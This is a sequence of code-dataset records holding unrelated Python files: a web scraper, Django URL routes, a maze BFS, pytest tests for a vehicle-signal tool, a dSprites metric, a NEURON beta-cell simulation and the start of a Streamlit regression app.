az.summary(samples_p)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lukepinkel/pylmm","sub_path":"tests/test12.py","file_name":"test12.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5194385212","text":"from nltk.util import pr\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef WebScrap(url):\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n # print(soup.prettify())\n soupList = list(soup.children)\n # print(soupList)\n html = Html(soupList)\n Title(html)\n Body(html)\n FindPTag(soup)\n \n\n\ndef WebScrapWithClasses(url):\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n print(\"cursivas: \" ,CursivaClass(soup))\n print(\"azul: \" ,CursivaClassAzul(soup))\n print(\"id: \", Id(soup,'parrafo1'))\n\n\ndef CursivaClass(soup):\n cursivas = soup.find_all('p', class_='cursiva')\n return cursivas\n\ndef CursivaClassAzul(soup):\n azul = soup.find_all('p', class_='azul')\n return azul\ndef Id(soup, id):\n parrafo = soup.find_all('p', id=id)\n return parrafo\n\ndef Html(soupList):\n html = list(soupList[2])\n print(\"HTML\" + \"\\n\")\n print(html)\n print(\"\\n\")\n return html\n\n\ndef Body(html):\n body = list(html[3].children)\n pOne = body[1].get_text()\n pTwo = body[3].get_text()\n\n print(\"P1: \" + pOne + \"\\n P2: \" + pTwo)\n\n\ndef FindPTag(soup):\n p = soup.find_all('p')\n # con soup.find('p') devolvería la primera\n\n print(\"Search by tag: \", p)\n\n\ndef Title(html):\n head = list(html[1].children)\n title = head[1]\n print(title.get_text())\n print(\"\\n\")\n\n\nclass main():\n # WebScrap('http://esp.uem.es/ssii/holaMundo.html')\n WebScrapWithClasses('http://esp.uem.es/ssii/holaMundo2.html')\n","repo_name":"somozadev/SISTEMAS_INTELIGENTES","sub_path":"Web_Scraper/webScraper.py","file_name":"webScraper.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14742941187","text":"# streams.py\n# streams: API URL endpoints to be called\n# properties:\n# : Plural stream name for the endpoint\n# path: API endpoint relative path, when added to the base URL, creates the full path,\n# default = stream_name\n# key_properties: Primary key fields for identifying an endpoint record.\n# replication_method: INCREMENTAL or FULL_TABLE\n# replication_keys: bookmark_field(s), typically a date-time, used for filtering the results\n# and setting the state\n# params: Query, sort, and other endpoint specific parameters; default = {}\n# data_key: JSON element containing the results list for the endpoint\n# bookmark_query_field: From date-time field used for filtering the query\n# bookmark_type: Data type for bookmark, integer or datetime\n\n# pylint: disable=line-too-long\nSTREAMS = {\n # Reference: https://developer.twitter.com/en/docs/ads/campaign-management/api-reference/accounts#accounts\n \"accounts\": {\n \"path\": \"accounts\",\n \"data_key\": \"data\",\n \"key_properties\": [\"id\"],\n \"replication_method\": \"FULL_TABLE\",\n \"replication_keys\": [],\n \"params\": {\n \"account_ids\": \"{account_ids}\",\n \"sort_by\": [\"updated_at-desc\"],\n \"with_deleted\": \"{with_deleted}\",\n \"count\": 1000,\n \"cursor\": None,\n },\n },\n # Reference: https://developer.twitter.com/en/docs/ads/campaign-management/api-reference/campaigns#campaigns\n \"campaigns\": {\n \"path\": \"accounts/{account_id}/campaigns\",\n \"data_key\": 
\"data\",\n \"key_properties\": [\"id\"],\n \"replication_method\": \"FULL_TABLE\",\n \"replication_keys\": [],\n \"params\": {\n \"sort_by\": [\"updated_at-desc\"],\n \"with_deleted\": \"{with_deleted}\",\n \"count\": 1000,\n \"cursor\": None,\n },\n },\n}\n# pylint: enable=line-too-long\n\n# De-nest children nodes for Discovery mode\ndef flatten_streams():\n flat_streams = {}\n # Loop through parents\n for stream_name, endpoint_config in STREAMS.items():\n flat_streams[stream_name] = endpoint_config\n # Loop through children\n children = endpoint_config.get(\"children\")\n if children:\n for child_stream_name, child_endpoint_config in children.items():\n flat_streams[child_stream_name] = child_endpoint_config\n flat_streams[child_stream_name][\"parent_stream\"] = stream_name\n return flat_streams\n","repo_name":"mohitverma24/tap-twitter-ads","sub_path":"tap_twitter_ads/streams.py","file_name":"streams.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5459810286","text":"from django.utils.translation import ugettext_lazy as _\n\nfrom delivery24 import settings\n\n\nif settings.DEBUG:\n CUSTOMER_CONFIRM_WORK_TIMEOUT_S = 60 * 2 # 2 minutes\n DRIVER_FIND_TIMEOUT_S = 60 * 1 # 1 minutes\n PERIODIC_SET_WORK_DONE_S = 10.0 # 10 seconds\n PERIODIC_DELETE_UNCONFIRMED_SIGNUP_S = 60 * 1 # 1 minute\n USER_SIGNUP_CONFIRM_TIMEOUT_S = 60 * 1 # 1 minute\nelse:\n CUSTOMER_CONFIRM_WORK_TIMEOUT_S = 60 * 10 # 10 minutes\n DRIVER_FIND_TIMEOUT_S = 60 * 3 # 3 minutes\n PERIODIC_SET_WORK_DONE_S = 60.0 * 60.0 * 1.0 # 1 hour\n PERIODIC_DELETE_UNCONFIRMED_SIGNUP_S = 60 * 15 # 15 minutes\n USER_SIGNUP_CONFIRM_TIMEOUT_S = 60 * 15 # 15 minutes\n\n#######################################################################\nVERIFF_CODE_LEN = 4\nORDER_ID_LEN = 8\n\nPAYMENT_METHOD_CASH = 0\nPAYMENT_METHOD_BANK = 1\nPAYMENT_METHOD_BOTH = 2\n\n# Below are choices used in User and Order models\nPAYMENT_METHOD = [\n (PAYMENT_METHOD_CASH, _('Cash')),\n # (PAYMENT_METHOD_BANK, _('Bank')),\n # (PAYMENT_METHOD_BOTH, _('Both')),\n]\n\nPREFERRED_LANGUAGE = [\n (1, _('English')),\n (2, _('Russian')),\n (3, _('Estonian')),\n]\n\nCAR_TYPE = [\n (0, _('S')),\n (1, _('M')),\n (2, _('L')),\n]\n\nWORK_STATUS = [\n (1, 'Not started'),\n (2, 'In progress'),\n (3, 'Done'),\n (4, 'Canceled'),\n]\n\n","repo_name":"masb3/delivery24","sub_path":"delivery24/core/proj_conf.py","file_name":"proj_conf.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36916904399","text":"#220913_boj_2178_미로탐색_실버1_BFS_ pass 코드 (DFS는 시간초과 뜸)\n\ndef bfs(i, j, N, M):\n visited = [[0] * M for _ in range(N)]\n q = []\n q.append((i, j))\n visited[i][j] = 1\n while q:\n i, j = q.pop(0)\n if i == N-1 and j == M-1:\n return visited[i][j]\n for di, dj in [[0, 1], [1, 0], [0, -1], [-1, 0]]:\n ni, nj = i + di, j + dj\n if 0 <= ni < N and 0 <= nj < M and miro[ni][nj] != 0 and visited[ni][nj] == 0:\n q.append((ni, nj))\n visited[ni][nj] = visited[i][j] + 1\n\nN,M = map(int,input().split())\nmiro = [list(map(int,input())) for _ in range(N)]\n\nprint(bfs(0, 0, N, M))\n","repo_name":"burgerfacegirl/Algorithm","sub_path":"boj/2178_miro.py","file_name":"2178_miro.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4349456209","text":"import pytest\nimport os\n\n\n# 
#################### Helper methods #############################\n\n@pytest.fixture\ndef change_test_dir(request, monkeypatch):\n # To make sure we run from test directory\n monkeypatch.chdir(request.fspath.dirname)\n\n\n@pytest.mark.parametrize(\"format, output_file, comparison_file, is_warning_expected\", [\n ('json', 'out.json', 'expected.json', False),\n ('yaml', 'out.yaml', 'expected.yaml', False),\n ('csv', 'out.csv', 'expected.csv', False),\n ('protobuf', 'out.proto', 'expected.proto', True),\n ('idl', 'out.idl', 'expected.idl', True),\n ('franca', 'out.fidl', 'expected.fidl', True),\n ('graphql', 'out.graphql', 'expected.graphql', True)])\ndef test_no_expand(format, output_file, comparison_file, is_warning_expected: bool, change_test_dir):\n\n args = [\"../../../vspec2x.py\", \"--no-expand\", \"--format\", format]\n if format == 'json':\n args.append('--json-pretty')\n args.extend([\"-u\", \"../test_units.yaml\",\n \"test.vspec\", output_file, \"1>\", \"out.txt\", \"2>&1\"])\n test_str = \" \".join(args)\n\n result = os.system(test_str)\n os.system(\"cat out.txt\")\n assert os.WIFEXITED(result)\n assert os.WEXITSTATUS(result) == 0\n\n # For exporters not supporting \"no-expand\" a warning shall be given\n test_str = 'grep \\\"no_expand not supported by exporter\\\" out.txt > /dev/null'\n result = os.system(test_str)\n assert os.WIFEXITED(result)\n if is_warning_expected:\n assert os.WEXITSTATUS(result) == 0\n else:\n assert os.WEXITSTATUS(result) == 1\n\n test_str = f\"diff {output_file} {comparison_file}\"\n result = os.system(test_str)\n os.system(\"rm -f out.txt\")\n assert os.WIFEXITED(result)\n assert os.WEXITSTATUS(result) == 0\n\n os.system(f\"rm -f {output_file}\")\n\n# Overlay tests, just showing for JSON\n\n\n@pytest.mark.parametrize(\"no_expand, comparison_file\", [\n (False, 'expected_overlay_expand.json'),\n (True, 'expected_overlay_no_expand.json')])\ndef test_json_overlay(no_expand, comparison_file, change_test_dir):\n \"\"\"Test with overlay and expansion (for reference/comparison)\"\"\"\n args = [\"../../../vspec2x.py\"]\n\n if no_expand:\n args.append('--no-expand')\n\n args.extend([\"--format\", \"json\", \"--json-pretty\", \"-u\", \"../test_units.yaml\",\n \"test.vspec\", \"-o\", \"overlay.vspec\", \"out.json\", \"1>\", \"out.txt\", \"2>&1\"])\n test_str = \" \".join(args)\n\n result = os.system(test_str)\n os.system(\"cat out.txt\")\n assert os.WIFEXITED(result)\n assert os.WEXITSTATUS(result) == 0\n\n test_str = f\"diff out.json {comparison_file}\"\n result = os.system(test_str)\n os.system(\"rm -f out.txt\")\n assert os.WIFEXITED(result)\n assert os.WEXITSTATUS(result) == 0\n\n os.system(\"rm -f out.json\")\n","repo_name":"COVESA/vss-tools","sub_path":"tests/vspec/test_no_expand/test_no_expand.py","file_name":"test_no_expand.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"31"} +{"seq_id":"71109252888","text":"from django.urls import path\nfrom .views.category import(\n CategoryCreateView,\n CategoryUpdateView,\n CategoryDeleteView,\n CategoryGetIdView,\n CategoryGetView,\n)\n\nurlpatterns = [\n path('category/create/', CategoryCreateView.as_view()),\n path('category/update//', CategoryUpdateView.as_view()),\n path('category/delete//', CategoryDeleteView.as_view()),\n path('category/get//', CategoryGetIdView.as_view()),\n path('category/get/', CategoryGetView.as_view()),\n]\n\nfrom .views.subcategory import(\n SubCategoryCreateView,\n SubCategoryUpdateView,\n 
SubCategoryDeleteView,\n SubCategoryGetIdView,\n SubCategoryGetView,\n)\n\nurlpatterns += [\n path('subcategory/create/', SubCategoryCreateView.as_view()),\n path('subcategory/update//', SubCategoryUpdateView.as_view()),\n path('subcategory/delete//', SubCategoryDeleteView.as_view()),\n path('subcategory/get//', SubCategoryGetIdView.as_view()),\n path('subcategory/get/', SubCategoryGetView.as_view()),\n]\n\nfrom .views.product import(\n ProductCreateView,\n ProductUpdateView,\n ProductDeleteView,\n ProductGetIdView,\n ProductGetView,\n ProductGetSubCategoryView,\n ProductGetBrandView,\n)\n\nurlpatterns += [\n path('product/create/', ProductCreateView.as_view()),\n path('product/update//', ProductUpdateView.as_view()),\n path('product/delete//', ProductDeleteView.as_view()),\n path('product/get//', ProductGetIdView.as_view()),\n path('product/get/', ProductGetView.as_view()),\n path('product/get/subcategory//', ProductGetSubCategoryView.as_view()),\n path('product/get/brand//', ProductGetBrandView.as_view()),\n]\n\nfrom .views.productimg import(\n ProductImageCreateView,\n ProductImageUpdateView,\n ProductImageDeleteView,\n ProductImageGetIdView,\n ProductImageGetView,\n)\n\nurlpatterns += [\n path('productimage/create/', ProductImageCreateView.as_view()),\n path('productimage/update//', ProductImageUpdateView.as_view()),\n path('productimage/delete//', ProductImageDeleteView.as_view()),\n path('productimage/get//', ProductImageGetIdView.as_view()),\n path('productimage/get/', ProductImageGetView.as_view()),\n]\n\nfrom .views.like import(\n LikeCreateView,\n LikeDeleteView,\n)\n\nurlpatterns += [\n path('like/create/', LikeCreateView.as_view()),\n path('like/delete//', LikeDeleteView.as_view()),\n]\n\nfrom .views.card import(\n CardCreateView,\n CardUpdateView,\n CardDeleteView,\n CardGetIdView,\n CardGetView,\n)\n\nurlpatterns += [\n path('card/create/', CardCreateView.as_view()),\n path('card/update//', CardUpdateView.as_view()),\n path('card/delete//', CardDeleteView.as_view()),\n path('card/get//', CardGetIdView.as_view()),\n path('card/get/', CardGetView.as_view()),\n]\n\nfrom .views.order import(\n OrderCreateView,\n OrderDeleteView,\n OrderGetView,\n)\n\nurlpatterns += [\n path('order/create/', OrderCreateView.as_view()),\n path('order/delete//', OrderDeleteView.as_view()),\n path('order/get/', OrderGetView.as_view()),\n]\n\nfrom .views.certificate import(\n CertificateCreateView,\n CertificateUpdateView,\n CertificateGetView,\n CertificateGetIdView,\n CertificateDeleteView,\n)\n\nurlpatterns += [\n path('certificate/create/', CertificateCreateView.as_view()),\n path('certificate/update//', CertificateUpdateView.as_view()),\n path('certificate/get/', CertificateGetView.as_view()),\n path('certificate/get//', CertificateGetIdView.as_view()),\n path('certificate/delete//', CertificateDeleteView.as_view()),\n]\n\nfrom .views.contaket import(\n ContaketCreateView,\n ContaketUpdateView,\n ContaketGetView,\n ContaketGetIdView,\n ContaketDeleteView,\n)\n\nurlpatterns += [\n path('contaket/create/', ContaketCreateView.as_view()),\n path('contaket/update//', ContaketUpdateView.as_view()),\n path('contaket/get/', ContaketGetView.as_view()),\n path('contaket/get//', ContaketGetIdView.as_view()),\n path('contaket/delete//', ContaketDeleteView.as_view()),\n]\n\nfrom .views.about import(\n AboutCreateView,\n AboutUpdateView,\n AboutGetView,\n AboutGetIdView,\n AboutDeleteView,\n)\n\nurlpatterns += [\n path('about/create/', AboutCreateView.as_view()),\n path('about/update//', 
AboutUpdateView.as_view()),\n path('about/get/', AboutGetView.as_view()),\n path('about/get//', AboutGetIdView.as_view()),\n path('about/delete//', AboutDeleteView.as_view()),\n]\n\nfrom .views.companyquestion import(\n CompanyQuestionCreateView,\n CompanyQuestionUpdateView,\n CompanyQuestionGetView,\n CompanyQuestionGetIdView,\n CompanyQuestionDeleteView,\n)\n\nurlpatterns += [\n path('companyquestion/create/', CompanyQuestionCreateView.as_view()),\n path('companyquestion/update//', CompanyQuestionUpdateView.as_view()),\n path('companyquestion/get/', CompanyQuestionGetView.as_view()),\n path('companyquestion/get//', CompanyQuestionGetIdView.as_view()),\n path('companyquestion/delete//', CompanyQuestionDeleteView.as_view()),\n]\n\nfrom .views.home import(\n HomeView,\n SearchView,\n)\n\nurlpatterns += [\n path('', HomeView.as_view()),\n path('search/', SearchView.as_view()),\n]\n\nfrom .views.userauth import(\n UserCreateView,\n UserLoginView,\n UserLogOutView,\n UserListView,\n UserAddAdminView,\n UserDeleteAdminView,\n)\n\nurlpatterns += [\n path('user/create/', UserCreateView.as_view()),\n path('user/login/', UserLoginView.as_view()),\n path('user/logout/', UserLogOutView.as_view()),\n path('user/list/', UserListView.as_view()),\n path('user/add/admin//', UserAddAdminView.as_view()),\n path('user/delete/admin//', UserDeleteAdminView.as_view()),\n]\n\nfrom .views.callback import(\n CallBackCreateView,\n CallBackDeleteView,\n CallBackListView,\n CallBackDetailView,\n CallBackUpdateView,\n)\n\nurlpatterns += [\n path('callback/create/', CallBackCreateView.as_view()),\n path('callback/delete//', CallBackDeleteView.as_view()),\n path('callback/list/', CallBackListView.as_view()),\n path('callback/detail//', CallBackDetailView.as_view()),\n path('callback/update//', CallBackUpdateView.as_view()),\n]\n\nfrom .views.brand import(\n BrandCreateView,\n BrandDeleteView,\n BrandListView,\n BrandDetailView,\n BrandUpdateView,\n)\n\nurlpatterns += [\n path('brand/create/', BrandCreateView.as_view()),\n path('brand/delete//', BrandDeleteView.as_view()),\n path('brand/list/', BrandListView.as_view()),\n path('brand/detail//', BrandDetailView.as_view()),\n path('brand/update//', BrandUpdateView.as_view()),\n]\n","repo_name":"quvvatullayev/maxcom","sub_path":"maxcom/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22450200072","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom profession_2.items import Profession2Item_scale\n\n\nclass ScaleSpider(scrapy.Spider):\n name = 'scale'\n #allowed_domains = ['ios.com']\n start_urls = ['http://www.kaoshidian.com/kaoyan/bl-0-0-0-0-0.html?q=%E8%AE%A1%E7%AE%97%E6%9C%BA']\n\n def parse(self, response):\n demo=response.xpath(\"//table[@class='zhdetail']/tr\")\n Demo=demo[2:]\n\n for list in Demo:\n item=Profession2Item_scale()\n list_td = list.xpath(\"./td/text()\").extract()\n list_td_a = list.xpath(\"./td/a/text()\").extract()\n\n item[\"year\"] = list_td[0]\n item[\"area\"] = list_td[1]\n item[\"school_name\"] = list_td_a[0]\n item[\"profession_name\"] = list_td[2]\n item[\"marjon_code\"] = list_td[3]\n item[\"marjon_name\"] = list_td_a[1]\n try:\n item[\"enroll_sum\"] = list_td[4]\n except:\n item[\"enroll_sum\"] = \" \"\n try:\n item[\"admit_sum\"] = list_td[5]\n except:\n item[\"admit_sum\"] = \" \"\n try:\n item[\"scale_admit\"] = list_td[6]\n except:\n item[\"scale_admit\"] = \" \"\n try:\n item[\"excuse_sum\"] = list_td[7]\n 
except:\n item[\"excuse_sum\"] = \" \"\n yield item\n","repo_name":"SelmerZhang/Code","sub_path":"Python/profession_2/profession_2/spiders/scale.py","file_name":"scale.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39211108469","text":"import pyterrier as pt\nimport pandas as pd\nif not pt.started():\n pt.init() \n\n# Index path\nindex_loc = \"./index\"\n\n#Read the collection file and drop empty lines\ndf = pd.read_csv('./data/collection.tsv', sep='\\t', names=['docno', 'text'],dtype=str, encoding='utf-8')\ndf.dropna(inplace=True)\n\n# Dfine the IterDictIndexer\nindexer = pt.IterDictIndexer(index_loc, meta={\"docno\": 20, \"text\": 4096}, overwrite=True, verbose=True, tokeniser=\"UTFTokeniser\")\n\n# Trigger the indexing process\nindex = indexer.index(df.to_dict(orient=\"records\"))","repo_name":"Nilhenrik/dat640_group_project","sub_path":"indexingBaseline.py","file_name":"indexingBaseline.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6850809197","text":"import tensorflow_datasets as tfds\nimport numpy as np\n\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import make_pipeline\n\ndef get_dsprites_tf_dataset():\n # data have been shuffled by tensorflow\n # data will be batched before training\n return tfds.load('Dsprites', split='train', batch_size=256)\n\nclass OrderedDsprites:\n def __init__(self, data_file='dsprites_ordered.npz'):\n # load dataset\n dataset = np.load(data_file, allow_pickle=True, encoding=\"latin1\")\n self.imgs = dataset[\"imgs\"][:]\n self.latent_sizes = dataset[\"metadata\"][()][\"latents_sizes\"][:]\n # get rid of color dimension here\n self.latent_sizes = self.latent_sizes[1:]\n self.latent_bases = np.concatenate((\n self.latent_sizes[::-1].cumprod()[::-1][1:], np.array([1,]),))\n\n def sample_latent(self, nsamples=1):\n samples = np.zeros((nsamples, self.latent_sizes.size), dtype=int)\n for lat_i, lat_size in enumerate(self.latent_sizes):\n samples[:, lat_i] = np.random.randint(lat_size, size=nsamples)\n return samples\n\n def get_images_from_latent(self, latent_samples):\n # latent to indices\n indices = np.dot(latent_samples, self.latent_bases).astype(int)\n return self.imgs[indices]\n \n def compute_zdiff_y(self, bvae, n_zdiff_per_y, n_img_per_zdiff):\n # create arrays\n y_size = self.latent_sizes.size\n z_diff_all = np.zeros((y_size, n_zdiff_per_y, bvae.latent_dim))\n y_all = np.zeros((y_size, n_zdiff_per_y), dtype=int)\n \n for y in range(y_size):\n # sample\n v1 = self.sample_latent(n_zdiff_per_y * n_img_per_zdiff)\n v2 = self.sample_latent(n_zdiff_per_y * n_img_per_zdiff)\n # keey y the same\n v1[:, y] = v2[:, y]\n # get images\n x1 = self.get_images_from_latent(v1)\n x2 = self.get_images_from_latent(v2)\n # encode \n z1 = bvae.encoder.predict(x1)[0]\n z2 = bvae.encoder.predict(x2)[0]\n # z_diff\n z_diff = np.abs(z1 - z2)\n # separate dimensions: n_zdiff_per_y, n_img_per_zdiff\n z_diff = z_diff.reshape((n_zdiff_per_y, n_img_per_zdiff, bvae.latent_dim))\n # take average over n_img_per_zdiff\n z_diff_all[y, :, :] = np.mean(z_diff, axis=1)\n # y\n y_all[y, :] = y\n \n # merge dimensions: y_size, n_zdiff_per_y\n z_diff_all = z_diff_all.reshape((y_size * n_zdiff_per_y, bvae.latent_dim))\n y_all = y_all.reshape((y_size * n_zdiff_per_y))\n \n # shuffle z_diff and y 
consistently\n shuffle_indices = np.arange(0, y_size * n_zdiff_per_y)\n np.random.shuffle(shuffle_indices)\n z_diff_all = z_diff_all[shuffle_indices]\n y_all = y_all[shuffle_indices]\n return z_diff_all, y_all\n \n def compute_disentangle_metric_score(self, bvae, n_zdiff_per_y=5000, \n n_img_per_zdiff=64, random_seed=0):\n # seed\n np.random.seed(random_seed)\n # prep training and test data\n zdiff, y = self.compute_zdiff_y(bvae, n_zdiff_per_y, n_img_per_zdiff)\n # sklearn linear classifier\n classifier = make_pipeline(\n StandardScaler(), \n SGDClassifier(loss=\"log\", early_stopping=True, random_state=random_seed)\n )\n # train\n classifier.fit(zdiff, y)\n # score with test data\n return classifier.score(zdiff, y)\n","repo_name":"jamesacris/constrained-vae","sub_path":"dSprites_epsilon_VAE/dsprites_data.py","file_name":"dsprites_data.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36606179725","text":"from AOC_19.IntComputer import IntProcess\n\n\ndef update_screen(pixels, screen=dict()):\n for i in range(0, len(pixels), 3):\n screen[(pixels[i], pixels[i + 1])] = pixels[i + 2]\n return screen\n\n\ndef display(screen):\n for y in range(max([pixel[1] for pixel in screen.keys()]) + 1):\n row = \"\"\n for x in range(max([pixel[0] for pixel in screen.keys()]) + 1):\n row = row + str(screen[(x, y)])\n print(row)\n print(\"Score:\", screen[(-1, 0)])\n\n\ndef loc(obj, screen):\n for y in range(max([pixel[1] for pixel in screen.keys()]) + 1):\n for x in range(max([pixel[0] for pixel in screen.keys()]) + 1):\n if screen[(x, y)] == obj:\n return x, y\n\n\nscreen = update_screen(IntProcess(open(\"input\")).run())\n\nprint(\"Part 1:\", sum([pixel == 2 for pixel in screen.values()]))\n\ngame = IntProcess(open(\"input\"))\ngame.prog[0] = 2\nwhile game.ip != -1 and sum([pixel == 2 for pixel in screen.values()]) > 0:\n b_x, b_y = loc(4, screen)\n p_x, _ = loc(3, screen)\n if p_x < b_x:\n inp = 1\n elif p_x > b_x:\n inp = -1\n else:\n inp = 0\n screen = update_screen(game.run([inp]), screen)\n # display(screen)\n\nprint(\"Part 2:\")\ndisplay(screen)\n\n\n\n","repo_name":"evanphoward/AdventOfCode","sub_path":"AOC_19/Day13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"6580741273","text":"from neuron import h\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pylab as plt\n\n## \n## Simulation of the electrophysiology of the beta-cell.\n## Using package NEURON yale.\n## \n## Created by Chon Lei\n## The currently version is based on the model from \n## Cha et al. 
2011\n## Last updated: 25/03/2017\n## \n\n\n## Import system setup files (.hoc files)\nh.load_file (\"betacell.hoc\")\n\n\n## System set-up\nprint(\"*************************\")\nprint(\"Testing system: two coupled beta cells.\")\nprint(\"Starting system set-up...\")\nbetacell = h.betacell()\nvarp = 0.1\nHetDictCha2011 = {'gkca':(2.13, varp), \\\n 'gkatp':(2.31, varp*2.5), \\\n 'pserca':(0.096, varp), \\\n 'prel':(0.46, varp), \\\n 'kglc':(0.000126, varp), \\\n 'kbox':(0.0000063, varp), \\\n 'pop':(0.0005, varp), \\\n 'atptot':(4.0, varp)}\nbetacell.soma(0.5).GKto_bcellcha = HetDictCha2011['gkca'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['gkca'][1] )\nbetacell.soma(0.5).gKATP_bcellcha = HetDictCha2011['gkatp'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['gkatp'][1] )\nbetacell.soma(0.5).PCaER_bcellcha = HetDictCha2011['pserca'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['pserca'][1] )\nbetacell.soma(0.5).Pleak_bcellcha =HetDictCha2011['prel'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['prel'][1] )\nbetacell.soma(0.5).KRe_bcellcha = HetDictCha2011['kglc'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['kglc'][1] )\nbetacell.soma(0.5).Kfa_bcellcha = HetDictCha2011['kbox'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['kbox'][1] )\nbetacell.soma(0.5).Pop_bcellcha = HetDictCha2011['pop'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['pop'][1] )\nbetacell.soma(0.5).totalATP_bcellcha = HetDictCha2011['atptot'][0]*( 1.0 + np.random.normal(0.0,1.0)*HetDictCha2011['atptot'][1] )\nbetacell.soma(0.5).gammaapplytime_bcellcha = 5e2\nbetacell.soma(0.5).gammatoset_bcellcha = 8.0\n\n## External stimulation\n'''\nstimulus = h.IClamp (0.5, sec = betacell.soma)\nstimulus.delay = 100\nstimulus.dur = 300\nstimulus.amp = 0.1 \n'''\n\n\n## System recorder initialisation\ntime = h.Vector()\ntime.record(h._ref_t)\n\nvm1 = h.Vector()\nvm1.record (betacell.soma(0.5)._ref_v)\n\"\"\"\natp = h.Vector()\natp.record (betacell.soma(0.5)._ref_atpi)\nadp = h.Vector()\nadp.record (betacell.soma(0.5)._ref_mgadpi)\n\n\"\"\"\nca = h.Vector()\nca.record (betacell.soma(0.5)._ref_cai)\n\nna = h.Vector()\nna.record (betacell.soma(0.5)._ref_nai)\nk = h.Vector()\nk.record (betacell.soma(0.5)._ref_ki)\n\n## Main simulation\nh.load_file(\"stdrun.hoc\")\nh.init()\n#h.v_init = -48.9045 #-69.8663703359279 or #-48.9045\nh.tstop = 25e4\nh.dt = 0.1\nh.steps_per_ms = 1./h.dt\nprint(\"Starting main simulation...\")\nh.run()\nprint(\"Simulation completed! 
:)\")\nprint(\"*************************\")\n\n\n## Exporting\n\n\n## Visualisation\ntime = np.array(time)\n\nplt.figure(1)\nvm1 = np.array(vm1)\nplt.plot(time, vm1, 'r-',label='cell1')\nplt.legend()\nplt.title(\"V\", fontsize=20)\nplt.xlabel(\"time [ms]\", fontsize=20)\nplt.ylabel(\"V [mV]\", fontsize=20)\nplt.savefig(\"test.png\")\n\"\"\"\nplt.figure(2)\natp = np.array(atp)\nplt.plot(time, atp, 'b-',label='atp')\nplt.legend()\nplt.title(\"ATP\", fontsize=20)\nplt.xlabel(\"time [ms]\", fontsize=20)\nplt.ylabel(\"conc [mM]\", fontsize=20)\n\n\nplt.figure(3)\nadp = np.array(adp)\nplt.plot(time, adp, 'r-',label='adp')\nplt.legend()\nplt.title(\"MgADP\", fontsize=20)\nplt.xlabel(\"time [ms]\", fontsize=20)\nplt.ylabel(\"conc [mM]\", fontsize=20)\n\n\"\"\"\nplt.figure(4)\nca = np.array(ca)\nplt.plot(time, ca, 'r-',label='Ca')\nplt.legend()\nplt.title(\"Ca\", fontsize=20)\nplt.xlabel(\"time [ms]\", fontsize=20)\nplt.ylabel(\"conc [mM]\", fontsize=20)\n\n\nplt.figure(5)\nna = np.array(na)\nplt.plot(time, na, 'b-',label='Na')\n#k = np.array(k)\n#plt.plot(time, k, 'k-',label='K')\nplt.legend()\nplt.title(\"Na\", fontsize=20)\nplt.xlabel(\"time [ms]\", fontsize=20)\nplt.ylabel(\"conc [mM]\", fontsize=20)\n\n\nplt.show()\n","repo_name":"chonlei/bHub_sim","sub_path":"models/betacell_cha2011_vMetabolic/main-test.py","file_name":"main-test.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36684703516","text":"# Import the Libraries\r\nimport streamlit as st\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom PIL import Image, ImageOps # Image processing\r\nimport pickle\r\nimport sklearn\r\nfrom sklearn.model_selection import train_test_split\r\nimport base64\r\n#####################################################################################################################\r\ndef download_link(object_to_download, download_filename, download_link_text):\r\n \r\n if isinstance(object_to_download,pd.DataFrame):\r\n object_to_download = object_to_download.to_csv(index=False)\r\n\r\n # some strings <-> bytes conversions necessary here\r\n b64 = base64.b64encode(object_to_download.encode()).decode()\r\n\r\n return f'{download_link_text}'\r\n#####################################################################################################################\r\n\r\n#Create a title and a sub-title\r\nst.write(\"\"\"\r\n# Universal ML Regressor\r\nSci Kit Learn Based ML Web App for Regression Applications\r\n\"\"\")\r\n\r\n#Open and Display an Image\r\n#image = Image.open('/content/gdrive/My Drive/Machine Learning Web Application/Diabetes Detection/Diabetes Detection.png')\r\n#st.image(image, 